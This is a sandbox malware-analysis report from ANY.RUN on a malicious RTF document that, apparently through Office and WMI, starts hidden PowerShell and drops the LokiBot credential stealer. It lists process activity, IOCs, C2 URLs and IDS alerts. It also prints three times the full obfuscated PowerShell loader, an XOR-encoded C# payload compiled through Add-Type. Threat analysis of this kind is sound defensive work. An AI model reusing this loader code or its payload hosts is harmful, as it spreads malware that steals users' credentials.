analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

1065787.doc

Full analysis: https://app.any.run/tasks/9b46e079-b23a-460f-96c5-03a0007298c7
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: July 17, 2019, 07:52:16
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
generated-doc
loader
trojan
lokibot
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

6575764E1A8413DACF53407BFE20D9BD

SHA1:

A2E599293A0F1EE267FBE5D69AE1578B46041B26

SHA256:

452D9E393D023DDE770F5B114A1BCC399B0A08C3F7871BD5291DA28E3B11BB88

SSDEEP:

1536:oZdMVpWGcC89Wv27E1AsTf4bEHpBS1DMO8tdjOlWKYWwX5P+HlM8QXyxgdivAu0T:oHMt5jsst5jsst5jsBtxS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts Visual C# compiler

      • powershell.exe (PID: 4036)
      • powershell.exe (PID: 592)
      • powershell.exe (PID: 3336)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 4036)
    • Application was dropped or rewritten from another process

      • cf7e913.exe (PID: 3500)
      • sedgf.exe (PID: 4060)
      • sedgf.exe (PID: 3824)
    • Downloads executable files from IP

      • powershell.exe (PID: 4036)
    • Writes to a start menu file

      • sedgf.exe (PID: 4060)
    • Detected artifacts of LokiBot

      • sedgf.exe (PID: 3824)
    • Connects to CnC server

      • sedgf.exe (PID: 3824)
    • LOKIBOT was detected

      • sedgf.exe (PID: 3824)
    • Actions looks like stealing of personal data

      • sedgf.exe (PID: 3824)
  • SUSPICIOUS

    • Executed via COM

      • EXCEL.EXE (PID: 1888)
      • EXCEL.EXE (PID: 3348)
      • EXCEL.EXE (PID: 2740)
      • excelcnv.exe (PID: 3776)
    • PowerShell script executed

      • powershell.exe (PID: 4036)
      • powershell.exe (PID: 592)
      • powershell.exe (PID: 3336)
    • Executed via WMI

      • powershell.exe (PID: 4036)
      • powershell.exe (PID: 592)
      • powershell.exe (PID: 3336)
    • Creates files in the user directory

      • powershell.exe (PID: 4036)
      • powershell.exe (PID: 592)
      • powershell.exe (PID: 3336)
      • cf7e913.exe (PID: 3500)
      • sedgf.exe (PID: 3824)
      • sedgf.exe (PID: 4060)
      • notepad++.exe (PID: 1672)
    • Executable content was dropped or overwritten

      • csc.exe (PID: 3052)
      • powershell.exe (PID: 4036)
      • cf7e913.exe (PID: 3500)
      • sedgf.exe (PID: 3824)
    • Starts itself from another location

      • cf7e913.exe (PID: 3500)
    • Application launched itself

      • sedgf.exe (PID: 4060)
    • Loads DLL from Mozilla Firefox

      • sedgf.exe (PID: 3824)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3784)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3784)
      • EXCEL.EXE (PID: 1888)
      • EXCEL.EXE (PID: 3348)
      • EXCEL.EXE (PID: 2740)
      • excelcnv.exe (PID: 3776)
    • Manual execution by user

      • explorer.exe (PID: 2848)
      • notepad++.exe (PID: 1672)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

InternalVersionNumber: 57435
CharactersWithSpaces: 4
Characters: 4
Words: -
Pages: 1
TotalEditTime: -
RevisionNumber: 1
ModifyDate: 2019:01:07 23:54:00
CreateDate: 2019:01:07 23:54:00
LastModifiedBy: Admin
Author: Admin
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
64
Monitored processes
20
Malicious processes
4
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs excel.exe no specs powershell.exe excel.exe no specs powershell.exe no specs excel.exe no specs csc.exe cvtres.exe no specs powershell.exe no specs csc.exe excelcnv.exe no specs cvtres.exe no specs csc.exe cvtres.exe no specs cf7e913.exe sedgf.exe explorer.exe no specs #LOKIBOT sedgf.exe notepad++.exe gup.exe

Process information

PID
CMD
Path
Indicators
Parent process
3784"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\1065787.doc.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1888"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
4036powershell -WindowStyle Hidden function tade9b1 { param($ge5fbeb) $e13a7f = 'e19777f';$w7b42 = ''; for ($i = 0; $i -lt $ge5fbeb.length; $i+=2) { $nf12b5 = [convert]::ToByte($ge5fbeb.Substring($i, 2), 16); $w7b42 += [char]($nf12b5 -bxor $e13a7f[($i / 2) % $e13a7f.length]); } return $w7b42; } $kdf58 = '104250595017351c424d525a0c131658575017641f16455c5a1965130b45505a52192f0b455c4558473500434f5e5452155e444a5e59504636484a43525a482158585059581511585a440c42150c5f5e17644e15115454197e785d104250595017351c424d525a19280045023a3d4713075d505417540a04424a175c535552075b4c6c730a097854475845124d13525245590309020b151b720811434067585e08110c1b70524336175e5a7653531400424a151e6a4615445b5b5e5446164558435e544600494d524559462c5f4d6743454614020e52001f2f0b45694345170203050d03001b15114350595017030757580f53054f5e6a7d5b5b7e0b155e4b431f150d004357525b0454471d19725943141c61565e59434658111b7b58560229585b4556451f4718641747420409585a1744430711585a17524f12004357177e591235454b175a0e0750035c061f44121758575017440451040d56561e5d3e75555b7e5a160a434d1f155c03175f5c5b04054449117c5943451f355e5059430a4433584b4342560a354356435254124718641747420409585a1744430711585a17524f120043571755580909114e005100034d78574367431445475f550502534964705943671217114b0001555450551517425e0811114f06525651491156424317130c5f4d174304075d575a1e0c6c22095d705a47581411191b7c524508005d0a0519530a09131517725912174869585e591258136b435b7a09135474525a58141c13151764521229504a437245140a430451565b150018641744430711585a17524f120043571741580f011143015403024d785743674314455f0d5455514a2c5f4d6743454615550a52051b0f0b4519505154050608100c47420409585a1744430711585a175e591245595c540f56505219104c7e591235454b174e065f070858170a170b5c500c0552064e11505d520e55574d13090302545204045c060e02555550090e151e4f5e585f1f4e065f0708580a0a7e0811614d45196d03175e104c5058120a114e54000050530a447e5943361143194d00515f500c48040052514d48080e550e0749455853520e0454191b0503020551500c5201035351010e0755005551520c0602065357000d151e1e5d0c57114d00515f500c047e5943361143176d5245094c4a5e5843584612520e0001015d1864705943671217114e520653005c52041f627e0811614d451e025d1058574317555004055f04550a565e585f1f16405103065c1f4d00005c04154052060203085a1b074f52551d564243170453500d5104554f4c4a5e5843584612520e0001015d18734043526c3b455908000e5157584a094f04064a55495f511b071e5c01440c7e591235454b1741045f0652047a5645150d505519765b0a0a5271705b5804045d11041e0c2b04434a5f565b48265e494e1f5f5752085f061b074a13020054541b554c0a43015403024d5f5c40177e0811614d451f4d5103080c1963582f0b450f031f1e4d5549090706554f49470a0e54544a5618024054005153070317605204265d505259434608045a0251035b0b544e17605204265d505259434e4c0a4a43455e0802115f510055055702047259410f175e575a5259124b765c4371580a01544b6756430e4d7457415e45090b5c5c5943193515545a5e565b200a5d5d524519271541555e5456120c5e57735643074c1a1b6b6b54005254000604154d11505d520e55574d130d5502035254040b151e0c0b50520c510319220a46575b585602235855521f430701540055061f4455550d0203535252015d060f035f5007090306005650010c0705035e50060906070e575c010f0702025151500e020053575d010f070002565001090107065655015f151e1b0003065b5405044f5e614b5854521516624d5645432f0b5756174e0402520704595240463543565452441536455845437e08035e115151000406030a1e0c67140a525c4444193511504b431f4e5501060f1e0c450311444b5917075d18414c555b5e0545424d56435e0545424d455e590145455853520e0454194a43455e0802114e035501500318424443450f0b5619535103525106041552065f52060e51150c151143505950170b5c500c0552065b36454b5e595048205c49434e0c000a43115e5943460c0c090c5e0b1151530f0151192a005f5e435f0c0f4e0c0b1e4c551f11541946040003520c7a585941031745176358751f115411400355505357176442551511435059501f0f4903101b06014f5e5c0056020503541a041f545f07171811460400035211671753515251050e6c1f5e495718191217530051050d00197b030b564d5f6a1e5d18435c43424508455c0056020503540a444a'; $kdf582 = tade9b1($kdf58); Add-Type -TypeDefinition $kdf582; [kd376b]::hec8a67(); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3348"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
592powershell -WindowStyle Hidden function tade9b1 { param($ge5fbeb) $e13a7f = 'e19777f';$w7b42 = ''; for ($i = 0; $i -lt $ge5fbeb.length; $i+=2) { $nf12b5 = [convert]::ToByte($ge5fbeb.Substring($i, 2), 16); $w7b42 += [char]($nf12b5 -bxor $e13a7f[($i / 2) % $e13a7f.length]); } return $w7b42; } $kdf58 = '104250595017351c424d525a0c131658575017641f16455c5a1965130b45505a52192f0b455c4558473500434f5e5452155e444a5e59504636484a43525a482158585059581511585a440c42150c5f5e17644e15115454197e785d104250595017351c424d525a19280045023a3d4713075d505417540a04424a175c535552075b4c6c730a097854475845124d13525245590309020b151b720811434067585e08110c1b70524336175e5a7653531400424a151e6a4615445b5b5e5446164558435e544600494d524559462c5f4d6743454614020e52001f2f0b45694345170203050d03001b15114350595017030757580f53054f5e6a7d5b5b7e0b155e4b431f150d004357525b0454471d19725943141c61565e59434658111b7b58560229585b4556451f4718641747420409585a1744430711585a17524f12004357177e591235454b175a0e0750035c061f44121758575017440451040d56561e5d3e75555b7e5a160a434d1f155c03175f5c5b04054449117c5943451f355e5059430a4433584b4342560a354356435254124718641747420409585a1744430711585a17524f120043571755580909114e005100034d78574367431445475f550502534964705943671217114b0001555450551517425e0811114f06525651491156424317130c5f4d174304075d575a1e0c6c22095d705a47581411191b7c524508005d0a0519530a09131517725912174869585e591258136b435b7a09135474525a58141c13151764521229504a437245140a430451565b150018641744430711585a17524f120043571741580f011143015403024d785743674314455f0d5455514a2c5f4d6743454615550a52051b0f0b4519505154050608100c47420409585a1744430711585a175e591245595c540f56505219104c7e591235454b174e065f070858170a170b5c500c0552064e11505d520e55574d13090302545204045c060e02555550090e151e4f5e585f1f4e065f0708580a0a7e0811614d45196d03175e104c5058120a114e54000050530a447e5943361143194d00515f500c48040052514d48080e550e0749455853520e0454191b0503020551500c5201035351010e0755005551520c0602065357000d151e1e5d0c57114d00515f500c047e5943361143176d5245094c4a5e5843584612520e0001015d1864705943671217114e520653005c52041f627e0811614d451e025d1058574317555004055f04550a565e585f1f16405103065c1f4d00005c04154052060203085a1b074f52551d564243170453500d5104554f4c4a5e5843584612520e0001015d18734043526c3b455908000e5157584a094f04064a55495f511b071e5c01440c7e591235454b1741045f0652047a5645150d505519765b0a0a5271705b5804045d11041e0c2b04434a5f565b48265e494e1f5f5752085f061b074a13020054541b554c0a43015403024d5f5c40177e0811614d451f4d5103080c1963582f0b450f031f1e4d5549090706554f49470a0e54544a5618024054005153070317605204265d505259434608045a0251035b0b544e17605204265d505259434e4c0a4a43455e0802115f510055055702047259410f175e575a5259124b765c4371580a01544b6756430e4d7457415e45090b5c5c5943193515545a5e565b200a5d5d524519271541555e5456120c5e57735643074c1a1b6b6b54005254000604154d11505d520e55574d130d5502035254040b151e0c0b50520c510319220a46575b585602235855521f430701540055061f4455550d0203535252015d060f035f5007090306005650010c0705035e50060906070e575c010f0702025151500e020053575d010f070002565001090107065655015f151e1b0003065b5405044f5e614b5854521516624d5645432f0b5756174e0402520704595240463543565452441536455845437e08035e115151000406030a1e0c67140a525c4444193511504b431f4e5501060f1e0c450311444b5917075d18414c555b5e0545424d56435e0545424d455e590145455853520e0454194a43455e0802114e035501500318424443450f0b5619535103525106041552065f52060e51150c151143505950170b5c500c0552065b36454b5e595048205c49434e0c000a43115e5943460c0c090c5e0b1151530f0151192a005f5e435f0c0f4e0c0b1e4c551f11541946040003520c7a585941031745176358751f115411400355505357176442551511435059501f0f4903101b06014f5e5c0056020503541a041f545f07171811460400035211671753515251050e6c1f5e495718191217530051050d00197b030b564d5f6a1e5d18435c43424508455c0056020503540a444a'; $kdf582 = tade9b1($kdf58); Add-Type -TypeDefinition $kdf582; [kd376b]::hec8a67(); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2740"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
3052"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\ltaxpfnr.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
1568C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESCED.tmp" "c:\Users\admin\AppData\Local\Temp\CSCCDC.tmp"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.4940 (Win7SP1.050727-5400)
3336powershell -WindowStyle Hidden function tade9b1 { param($ge5fbeb) $e13a7f = 'e19777f';$w7b42 = ''; for ($i = 0; $i -lt $ge5fbeb.length; $i+=2) { $nf12b5 = [convert]::ToByte($ge5fbeb.Substring($i, 2), 16); $w7b42 += [char]($nf12b5 -bxor $e13a7f[($i / 2) % $e13a7f.length]); } return $w7b42; } $kdf58 = '104250595017351c424d525a0c131658575017641f16455c5a1965130b45505a52192f0b455c4558473500434f5e5452155e444a5e59504636484a43525a482158585059581511585a440c42150c5f5e17644e15115454197e785d104250595017351c424d525a19280045023a3d4713075d505417540a04424a175c535552075b4c6c730a097854475845124d13525245590309020b151b720811434067585e08110c1b70524336175e5a7653531400424a151e6a4615445b5b5e5446164558435e544600494d524559462c5f4d6743454614020e52001f2f0b45694345170203050d03001b15114350595017030757580f53054f5e6a7d5b5b7e0b155e4b431f150d004357525b0454471d19725943141c61565e59434658111b7b58560229585b4556451f4718641747420409585a1744430711585a17524f12004357177e591235454b175a0e0750035c061f44121758575017440451040d56561e5d3e75555b7e5a160a434d1f155c03175f5c5b04054449117c5943451f355e5059430a4433584b4342560a354356435254124718641747420409585a1744430711585a17524f120043571755580909114e005100034d78574367431445475f550502534964705943671217114b0001555450551517425e0811114f06525651491156424317130c5f4d174304075d575a1e0c6c22095d705a47581411191b7c524508005d0a0519530a09131517725912174869585e591258136b435b7a09135474525a58141c13151764521229504a437245140a430451565b150018641744430711585a17524f120043571741580f011143015403024d785743674314455f0d5455514a2c5f4d6743454615550a52051b0f0b4519505154050608100c47420409585a1744430711585a175e591245595c540f56505219104c7e591235454b174e065f070858170a170b5c500c0552064e11505d520e55574d13090302545204045c060e02555550090e151e4f5e585f1f4e065f0708580a0a7e0811614d45196d03175e104c5058120a114e54000050530a447e5943361143194d00515f500c48040052514d48080e550e0749455853520e0454191b0503020551500c5201035351010e0755005551520c0602065357000d151e1e5d0c57114d00515f500c047e5943361143176d5245094c4a5e5843584612520e0001015d1864705943671217114e520653005c52041f627e0811614d451e025d1058574317555004055f04550a565e585f1f16405103065c1f4d00005c04154052060203085a1b074f52551d564243170453500d5104554f4c4a5e5843584612520e0001015d18734043526c3b455908000e5157584a094f04064a55495f511b071e5c01440c7e591235454b1741045f0652047a5645150d505519765b0a0a5271705b5804045d11041e0c2b04434a5f565b48265e494e1f5f5752085f061b074a13020054541b554c0a43015403024d5f5c40177e0811614d451f4d5103080c1963582f0b450f031f1e4d5549090706554f49470a0e54544a5618024054005153070317605204265d505259434608045a0251035b0b544e17605204265d505259434e4c0a4a43455e0802115f510055055702047259410f175e575a5259124b765c4371580a01544b6756430e4d7457415e45090b5c5c5943193515545a5e565b200a5d5d524519271541555e5456120c5e57735643074c1a1b6b6b54005254000604154d11505d520e55574d130d5502035254040b151e0c0b50520c510319220a46575b585602235855521f430701540055061f4455550d0203535252015d060f035f5007090306005650010c0705035e50060906070e575c010f0702025151500e020053575d010f070002565001090107065655015f151e1b0003065b5405044f5e614b5854521516624d5645432f0b5756174e0402520704595240463543565452441536455845437e08035e115151000406030a1e0c67140a525c4444193511504b431f4e5501060f1e0c450311444b5917075d18414c555b5e0545424d56435e0545424d455e590145455853520e0454194a43455e0802114e035501500318424443450f0b5619535103525106041552065f52060e51150c151143505950170b5c500c0552065b36454b5e595048205c49434e0c000a43115e5943460c0c090c5e0b1151530f0151192a005f5e435f0c0f4e0c0b1e4c551f11541946040003520c7a585941031745176358751f115411400355505357176442551511435059501f0f4903101b06014f5e5c0056020503541a041f545f07171811460400035211671753515251050e6c1f5e495718191217530051050d00197b030b564d5f6a1e5d18435c43424508455c0056020503540a444a'; $kdf582 = tade9b1($kdf58); Add-Type -TypeDefinition $kdf582; [kd376b]::hec8a67(); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3096"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\cxwd0o8p.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
Total events
2 974
Read events
2 351
Write events
0
Delete events
0

Modification events

No data
Executable files
4
Suspicious files
6
Text files
16
Unknown types
6

Dropped files

PID
Process
Filename
Type
3784WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRF8C8.tmp.cvr
MD5:
SHA256:
1888EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRA7.tmp.cvr
MD5:
SHA256:
3348EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR78D.tmp.cvr
MD5:
SHA256:
4036powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UULWC035SNFQIRFWI9Y2.temp
MD5:
SHA256:
2740EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRB56.tmp.cvr
MD5:
SHA256:
3052csc.exeC:\Users\admin\AppData\Local\Temp\CSCCDC.tmp
MD5:
SHA256:
1568cvtres.exeC:\Users\admin\AppData\Local\Temp\RESCED.tmp
MD5:
SHA256:
3052csc.exeC:\Users\admin\AppData\Local\Temp\ltaxpfnr.out
MD5:
SHA256:
592powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PG9RY1MU8AII3YPKAEXO.temp
MD5:
SHA256:
3096csc.exeC:\Users\admin\AppData\Local\Temp\CSC120D.tmp
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
6
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3824
sedgf.exe
POST
47.74.38.64:80
http://doktiq.info/chrix/cat.php
JP
malicious
4036
powershell.exe
GET
200
35.225.200.121:80
http://35.225.200.121/DD/10657878
US
executable
589 Kb
suspicious
3824
sedgf.exe
POST
47.74.38.64:80
http://doktiq.info/chrix/cat.php
JP
malicious
GET
200
92.122.213.210:80
http://isrg.trustid.ocsp.identrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D
unknown
der
1.36 Kb
whitelisted
3824
sedgf.exe
POST
47.74.38.64:80
http://doktiq.info/chrix/cat.php
JP
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4064
gup.exe
37.59.28.236:443
notepad-plus-plus.org
OVH SAS
FR
whitelisted
4036
powershell.exe
35.225.200.121:80
US
suspicious
3824
sedgf.exe
47.74.38.64:80
doktiq.info
Alibaba (China) Technology Co., Ltd.
JP
malicious
92.122.213.210:80
isrg.trustid.ocsp.identrust.com
Akamai International B.V.
whitelisted

DNS requests

Domain
IP
Reputation
doktiq.info
  • 47.74.38.64
malicious
notepad-plus-plus.org
  • 37.59.28.236
whitelisted
isrg.trustid.ocsp.identrust.com
  • 92.122.213.210
  • 92.122.213.200
whitelisted

Threats

PID
Process
Class
Message
4036
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
4036
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
4036
powershell.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
3824
sedgf.exe
A Network Trojan was detected
ET TROJAN LokiBot User-Agent (Charon/Inferno)
3824
sedgf.exe
A Network Trojan was detected
ET TROJAN LokiBot Checkin
3824
sedgf.exe
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
3824
sedgf.exe
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2
3824
sedgf.exe
A Network Trojan was detected
MALWARE [PTsecurity] Loki Bot Check-in M2
3824
sedgf.exe
A Network Trojan was detected
ET TROJAN LokiBot User-Agent (Charon/Inferno)
3824
sedgf.exe
A Network Trojan was detected
ET TROJAN LokiBot Checkin
Process
Message
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144